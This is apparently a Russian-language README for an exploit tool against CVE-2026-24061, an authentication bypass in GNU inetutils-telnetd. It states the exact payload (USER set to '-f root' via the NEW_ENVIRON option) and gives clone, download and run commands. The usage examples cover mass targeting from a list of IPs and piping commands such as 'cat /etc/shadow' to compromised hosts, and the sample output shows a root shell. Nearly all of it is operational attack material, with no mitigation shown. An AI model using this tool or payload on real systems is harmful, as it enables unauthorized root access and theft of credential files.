
Доказательство концепции: CVE-2026-24061 — это критическая уязвимость обхода аутентификации в GNU inetutils-telnetd, позволяющая неаутентифицированным удалённым злоумышленникам мгновенно получить доступ к root-оболочке путём эксплуатации вредоносной опции telnet NEW_ENVIRON.
Инструмент для исследований в области безопасности, предназначенный для эксплуатации CVE-2026-24061 — критической уязвимости удалённого обхода аутентификации в GNU inetutils-telnetd, которая позволяет получить мгновенный доступ к root-оболочке без аутентификации.
| Поле | Значение |
|---|---|
| Идентификатор CVE | CVE-2026-24061 |
| Оценка CVSS v3.1 | 9.8 (Критический) |
| Вектор CVSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Классификация CWE | CWE-88: Некорректная нейтрализация разделителей аргументов в команде |
| Поставщик | Проект GNU |
| Продукт | inetutils-telnetd |
| Дата раскрытия | 20 января 2026 г. |
| Наличие исправления | Будет определено |
Критическая уязвимость в GNU inetutils-telnetd до версии 2.7 включительно позволяет неаутентифицированным удалённым злоумышленникам полностью обойти аутентификацию и получить немедленный доступ к root-оболочке. Уязвимость эксплуатируется через telnet-опцию NEW_ENVIRON путём внедрения специально сформированной переменной окружения USER со значением "-f root", которая обходит все механизмы аутентификации.
| Диапазон версий | Статус |
|---|---|
| <= 2.7 | Уязвима |
| > 2.7 | Статус исправления: будет определён |
Уязвимость возникает из-за некорректной проверки переменной окружения USER в обработчике опции NEW_ENVIRON в telnetd. При обработке telnet-опции NEW_ENVIRON служба telnetd не очищает значение переменной USER перед передачей его процессу login. Устанавливая USER в "-f root", злоумышленник внедряет аргументы командной строки, которые приводят к успешной аутентификации пользователя root без запроса учётных данных.
Все зависимости входят в стандартную библиотеку Python:
| Пакет | Назначение |
|---|---|
| socket | Сетевое взаимодействие |
| select | Мультиплексирование ввода/вывода |
| sys | Взаимодействие с системой |
| os | Интерфейс операционной системы |
| threading | Параллельная эксплуатация целей |
| datetime | Форматирование временных меток |
# Clone the repository
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061
# Run the exploit
python3 main.py -u <target_ip>
# Download the exploit
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py
# Make it executable (Linux/macOS)
chmod +x main.py
# Run the exploit
python3 main.py -u <target_ip>
# Ensure Python 3.7+ is installed
python3 --version
# Download and run
python3 main.py -u <target_ip>
Usage:
python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
echo "commands" | python3 main.py -u <target_ip>
Arguments:
-u Single target IP address or hostname
-l Path to file containing target IPs (one per line)
-p Target port (default: 23)
-usr User to exploit as (default: root)
Эксплуатация одного экземпляра telnetd:
# Basic exploitation (default port 23, user root)
python3 main.py -u 192.168.1.100
# Custom port
python3 main.py -u 192.168.1.100 -p 2323
# Different user
python3 main.py -u 192.168.1.100 -usr admin
Выполнение команд в неинтерактивном режиме:
# Single command
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100
# Multiple commands
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100
# Command with output redirection
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100
Эксплуатация нескольких целей из файла:
python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin
Формат файла целей (targets.txt):
192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com
Примечания:
| Индикатор | Цвет | Описание |
|---|---|---|
[SUCCESS] | Зелёный | Успешное подключение к цели |
[EXPLOIT] | Зелёный | Эксплуатационная нагрузка успешно отправлена |
[INFO] | Синий | Информационное сообщение о текущей операции |
[ERROR] | Красный | Ошибка подключения, тайм-аут или ошибка эксплуатации |
[WARNING] | Жёлтый | Предупреждение (в настоящее время не используется) |
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass ║
║ ║
║ CVSS Score: 9.8 (Critical) ║
║ Impact: Remote Authentication Bypass - Instant Root Shell ║
║ ║
║ This tool is part of the HGrab Framework. ║
╚═══════════════════════════════════════════════════════════════╝
[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
Эксплойт использует фазу согласования протокола Telnet: